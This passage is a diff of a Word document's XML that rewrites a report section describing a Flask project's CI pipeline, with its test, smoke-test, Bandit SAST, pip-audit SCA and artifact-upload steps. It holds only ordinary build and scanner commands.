-        <w:t xml:space="preserve">The pipeline is defined in .github/workflows/ci.yml and runs on every push and on every pull request. It performs three independent checks and publishes the scanner report as a build artifact, so the evidence can be downloaded from the run page and attached to the report.</w:t>
+        <w:t xml:space="preserve">The pipeline is defined in .github/workflows/ci.yml and runs on every push and on every pull request. The job is called Tests, SAST, and SCA, and its steps are named after what they do, so the run page is readable evidence instead of a list of anonymous shell commands.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -2298,10 +2572,9 @@
         </w:tblCellMar>
       </w:tblPr>
       <w:tblGrid>
-        <w:gridCol w:w="1100"/>
-        <w:gridCol w:w="1500"/>
-        <w:gridCol w:w="3200"/>
-        <w:gridCol w:w="3270"/>
+        <w:gridCol w:w="2300"/>
+        <w:gridCol w:w="4200"/>
+        <w:gridCol w:w="2570"/>
       </w:tblGrid>
       <w:tr>
         <w:trPr>
@@ -2309,7 +2582,7 @@
         </w:trPr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1100" w:type="dxa"/>
+            <w:tcW w:w="2300" w:type="dxa"/>
             <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -2323,13 +2596,13 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">Stage</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
+              <w:t xml:space="preserve">Step</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
             <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -2343,13 +2616,13 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">Tool</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3200" w:type="dxa"/>
+              <w:t xml:space="preserve">What it does</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
             <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
             <w:vAlign w:val="center"/>
           </w:tcPr>
@@ -2363,27 +2636,7 @@
                 <w:sz w:val="19"/>
                 <w:szCs w:val="19"/>
               </w:rPr>
-              <w:t xml:space="preserve">Command</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3270" w:type="dxa"/>
-            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:b/>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">What it proves</w:t>
+              <w:t xml:space="preserve">Why it is there</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2391,73 +2644,55 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1100" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">SAST</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">bandit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3200" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">bandit -r ./app.py</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3270" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">no eval, subprocess, hardcoded secrets, weak crypto or string-built SQL</w:t>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Check out project, set up Python</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">checkout, Python 3.11 with a pip cache</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">a reproducible runner</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2465,73 +2700,55 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1100" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">SCA</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">pip-audit</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3200" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">pip-audit -r requirements.txt</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3270" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">no pinned dependency with a known CVE</w:t>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Install application and security tools</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">runtime dependencies plus bandit, pip-audit and pytest; imports verified and both scanner versions printed</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the scan runs against the versions actually installed, not against an assumption</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2539,73 +2756,335 @@
       <w:tr>
         <w:tc>
           <w:tcPr>
-            <w:tcW w:w="1100" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">Tests</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="1500" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">pytest</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3200" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">pytest -q</w:t>
-            </w:r>
-          </w:p>
-        </w:tc>
-        <w:tc>
-          <w:tcPr>
-            <w:tcW w:w="3270" w:type="dxa"/>
-            <w:vAlign w:val="center"/>
-          </w:tcPr>
-          <w:p>
-            <w:pPr>
-              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:sz w:val="19"/>
-                <w:szCs w:val="19"/>
-              </w:rPr>
-              <w:t xml:space="preserve">11 functional and security tests pass</w:t>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Prepare isolated CI configuration</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">writes .env.ci: a throwaway SECRET_KEY, a database in $RUNNER_TEMP and memory journal mode</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">a developer's local secret or database can never leak into CI, and nothing is left behind on the runner</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Run API and security regression tests</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">pytest with a JUnit report, then a live smoke test of the running server</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the unit tests use Flask's test client and bypass the socket; the smoke test proves the deployed server enforces the same rules</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">SAST - scan application source with Bandit</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">python -m bandit app.py init_db.py create_user.py -f json -o reports/bandit.json</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">a machine-readable report, not only console text</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">SCA - audit application dependencies</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">python -m pip_audit -r requirements.txt -f json -o reports/pip-audit.json</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">known CVEs in the pinned dependency tree</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Summarize results</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">parses the three reports and writes one conclusion to the run summary</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">a verdict the reader can check - and a build that fails when a control breaks</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2300" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Save test and security reports</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="4200" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">uploads reports/ as the security-reports artifact</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="2570" w:type="dxa"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:sz w:val="19"/>
+                <w:szCs w:val="19"/>
+              </w:rPr>
+              <w:t xml:space="preserve">the evidence survives the run</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -2619,6 +3098,15 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:spacing w:before="0" w:after="140" w:line="276" w:lineRule="auto"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">The smoke test is the part that is easy to omit and expensive to omit. pytest drives the application through Flask's test client, which never opens a socket; a suite that is green therefore says nothing about whether the process that is actually listening on port 8000 is configured the same way. The pipeline starts the real server with the same ephemeral configuration and repeats the four requests that matter:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
         <w:spacing w:before="60" w:after="0" w:line="240" w:lineRule="auto"/>
         <w:ind w:left="120" w:firstLine="0"/>
@@ -2629,232 +3117,52 @@
           <w:sz w:val="17"/>
           <w:szCs w:val="17"/>
         </w:rPr>
-        <w:t xml:space="preserve">name: security-ci</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">on: [push, pull_request]</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">jobs:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">  sast-sca:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    runs-on: ubuntu-latest</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    steps:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - uses: actions/checkout@v4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - uses: actions/setup-python@v5</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">        with: {python-version: '3.11', cache: pip}</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - run: pip install -r requirements.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - run: pip install bandit pip-audit pytest</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
-          <w:sz w:val="17"/>
-          <w:szCs w:val="17"/>
-        </w:rPr>
-        <w:t xml:space="preserve">      - run: bandit -r ./app.py -f txt -o bandit-report.txt</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
-        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
-        <w:ind w:left="120" w:firstLine="0"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
